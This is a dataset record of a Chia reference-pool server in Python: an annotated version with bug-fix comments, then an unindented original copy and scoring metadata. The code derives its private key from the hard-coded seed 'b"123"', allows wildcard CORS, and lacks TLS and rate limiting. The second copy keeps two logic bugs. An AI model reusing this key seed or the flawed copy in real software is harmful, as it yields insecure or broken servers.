            "(example) The Reference Pool allows you to pool with low fees, paying out daily using Chia.",
            self.pool.default_target_puzzle_hash,
        )
        return obj_to_response(res)

    async def submit_partial(self, request_obj) -> web.Response:
        """Accept a farmer's partial at /partial, score it, and respond with the result."""
        start_time = time.time()
        request = await request_obj.json()
        # TODO(pool): add rate limiting
        partial: SubmitPartial = SubmitPartial.from_json_dict(request)
        time_received_partial = uint64(int(time.time()))

        # It's important that on the first request from this farmer, the default difficulty is used. Changing the
        # difficulty requires a few minutes, otherwise farmers can abuse by setting the difficulty right under the
        # proof that they found.
        farmer_record: Optional[FarmerRecord] = await self.pool.store.get_farmer_record(partial.payload.launcher_id)
        if farmer_record is not None:
            current_difficulty: uint64 = farmer_record.difficulty
            balance = farmer_record.points
        else:
            current_difficulty = self.pool.default_difficulty
            balance = uint64(0)

        async def await_and_call(cor, *args):
            # 10 seconds gives our node some time to get the signage point, in case we are slightly slowed down
            await asyncio.sleep(10)
            # Bug fix: the varargs used to be passed as one tuple (cor(args))
            # instead of being unpacked into the coroutine's parameters.
            res = await cor(*args)
            self.pool.log.info(f"Delayed response: {res}")

        res_dict = await self.pool.process_partial(partial, time_received_partial, balance, current_difficulty, True)

        # Bug fix: this used to compare the literal string "error_code" to the
        # enum value (always False), so the delayed retry never ran.
        if res_dict.get("error_code") == PoolErr.NOT_FOUND.value:
            asyncio.create_task(
                await_and_call(
                    self.pool.process_partial, partial, time_received_partial, balance, current_difficulty, False
                )
            )

        self.pool.log.info(
            f"Returning {res_dict}, time: {time.time() - start_time} " f"singleton: {request['payload']['launcher_id']}"
        )
        return obj_to_response(res_dict)
# Module-level singletons so stop() can tear down what start_pool_server() built.
server: PoolServer = None
runner = None
async def start_pool_server():
    """Create the pool server, register its routes, and serve on port 80 until cancelled."""
    global server
    global runner
    # NOTE(review): key derived from std_hash(b"123") is clearly a placeholder;
    # a real deployment must load a secret key instead of a hard-coded seed.
    private_key: PrivateKey = AugSchemeMPL.key_gen(std_hash(b"123"))
    config = load_config(DEFAULT_ROOT_PATH, "config.yaml")
    overrides = config["network_overrides"]["constants"][config["selected_network"]]
    constants: ConsensusConstants = DEFAULT_CONSTANTS.replace_str_to_bytes(**overrides)
    server = PoolServer(private_key, config, constants)
    await server.start()
    # TODO(pool): support TLS
    app = web.Application()
    app.add_routes(
        [
            web.get("/", server.wrap_http_handler(server.index)),
            web.get("/pool_info", server.wrap_http_handler(server.get_pool_info)),
            web.post("/partial", server.wrap_http_handler(server.submit_partial)),
        ]
    )
    runner = aiohttp.web.AppRunner(app, access_log=None)
    await runner.setup()
    site = aiohttp.web.TCPSite(runner, "0.0.0.0", int(80))
    await site.start()
    # Park this coroutine; cancellation (e.g. Ctrl-C) ends serving.
    await asyncio.sleep(10000000)
async def stop():
    """Shut down the pool and release the aiohttp runner's resources."""
    await server.stop()
    await runner.cleanup()
if __name__ == "__main__":
    try:
        asyncio.run(start_pool_server())
    except KeyboardInterrupt:
        # Ctrl-C: run the async teardown before exiting.
        asyncio.run(stop())
|
import asyncio
import logging
import time
import traceback
from typing import Dict, Callable, Optional
import aiohttp
from blspy import AugSchemeMPL, PrivateKey
from aiohttp import web
from chia.protocols.pool_protocol import SubmitPartial, PoolInfo
from chia.util.hash import std_hash
from chia.consensus.default_constants import DEFAULT_CONSTANTS
from chia.consensus.constants import ConsensusConstants
from chia.util.json_util import obj_to_response
from chia.util.ints import uint64, uint32
from chia.util.default_root import DEFAULT_ROOT_PATH
from chia.util.config import load_config
from error_codes import PoolErr
from store import FarmerRecord
from pool import Pool
def allow_cors(response: web.Response) -> web.Response:
response.headers["Access-Control-Allow-Origin"] = "*"
return response
class PoolServer:
def __init__(self, private_key: PrivateKey, config: Dict, constants: ConsensusConstants):
self.log = logging.getLogger(__name__)
self.pool = Pool(private_key, config, constants)
async def start(self):
await self.pool.start()
async def stop(self):
await self.pool.stop()
def wrap_http_handler(self, f) -> Callable:
async def inner(request) -> aiohttp.web.Response:
try:
res_object = await f(request)
if res_object is None:
res_object = {}
except Exception as e:
tb = traceback.format_exc()
self.log.warning(f"Error while handling message: {tb}")
if len(e.args) > 0:
res_object = {"error_code": PoolErr.SERVER_EXCEPTION.value, "error_message": f"{e.args[0]}"}
else:
res_object = {"error_code": PoolErr.SERVER_EXCEPTION.value, "error_message": f"{e}"}
return allow_cors(obj_to_response(res_object))
return allow_cors(res_object)
return inner
async def index(self, _) -> web.Response:
return web.Response(text="Chia reference pool")
async def get_pool_info(self, _) -> web.Response:
res: PoolInfo = PoolInfo(
"The Reference Pool",
"https://www.chia.net/img/chia_logo.svg",
uint64(self.pool.min_difficulty),
uint32(self.pool.relative_lock_height),
"1.0.0",
str(self.pool.pool_fee),
"(example) The Reference Pool allows you to pool with low fees, paying out daily using Chia.",
self.pool.default_target_puzzle_hash,
)
return obj_to_response(res)
async def submit_partial(self, request_obj) -> web.Response:
start_time = time.time()
request = await request_obj.json()
# TODO(pool): add rate limiting
partial: SubmitPartial = SubmitPartial.from_json_dict(request)
time_received_partial = uint64(int(time.time()))
# It's important that on the first request from this farmer, the default difficulty is used. Changing the
# difficulty requires a few minutes, otherwise farmers can abuse by setting the difficulty right under the
# proof that they found.
farmer_record: Optional[FarmerRecord] = await self.pool.store.get_farmer_record(partial.payload.launcher_id)
if farmer_record is not None:
current_difficulty: uint64 = farmer_record.difficulty
balance = farmer_record.points
else:
current_difficulty = self.pool.default_difficulty
balance = uint64(0)
async def await_and_call(cor, *args):
# 10 seconds gives our node some time to get the signage point, in case we are slightly slowed down
await asyncio.sleep(10)
res = await cor(args)
self.pool.log.info(f"Delayed response: {res}")
res_dict = await self.pool.process_partial(partial, time_received_partial, balance, current_difficulty, True)
if "error_code" in res_dict and "error_code" == PoolErr.NOT_FOUND.value:
asyncio.create_task(
await_and_call(
self.pool.process_partial, partial, time_received_partial, balance, current_difficulty, False
)
)
self.pool.log.info(
f"Returning {res_dict}, time: {time.time() - start_time} " f"singleton: {request['payload']['launcher_id']}"
)
return obj_to_response(res_dict)
server: PoolServer = None
runner = None
async def start_pool_server():
global server
global runner
private_key: PrivateKey = AugSchemeMPL.key_gen(std_hash(b"123"))
config = load_config(DEFAULT_ROOT_PATH, "config.yaml")
overrides = config["network_overrides"]["constants"][config["selected_network"]]
constants: ConsensusConstants = DEFAULT_CONSTANTS.replace_str_to_bytes(**overrides)
server = PoolServer(private_key, config, constants)
await server.start()
# TODO(pool): support TLS
app = web.Application()
app.add_routes(
[
web.get("/", server.wrap_http_handler(server.index)),
web.get("/pool_info", server.wrap_http_handler(server.get_pool_info)),
web.post("/partial", server.wrap_http_handler(server.submit_partial)),
]
)
runner = aiohttp.web.AppRunner(app, access_log=None)
await runner.setup()
site = aiohttp.web.TCPSite(runner, "0.0.0.0", int(80))
await site.start()
await asyncio.sleep(10000000)
async def stop():
await server.stop()
await runner.cleanup()
if __name__ == "__main__":
try:
asyncio.run(start_pool_server())
except KeyboardInterrupt:
asyncio.run(stop())
|
en
| 0.920021
|
# TODO(pool): add rate limiting # It's important that on the first request from this farmer, the default difficulty is used. Changing the # difficulty requires a few minutes, otherwise farmers can abuse by setting the difficulty right under the # proof that they found. # 10 seconds gives our node some time to get the signage point, in case we are slightly slowed down # TODO(pool): support TLS
| 1.961497
| 2
|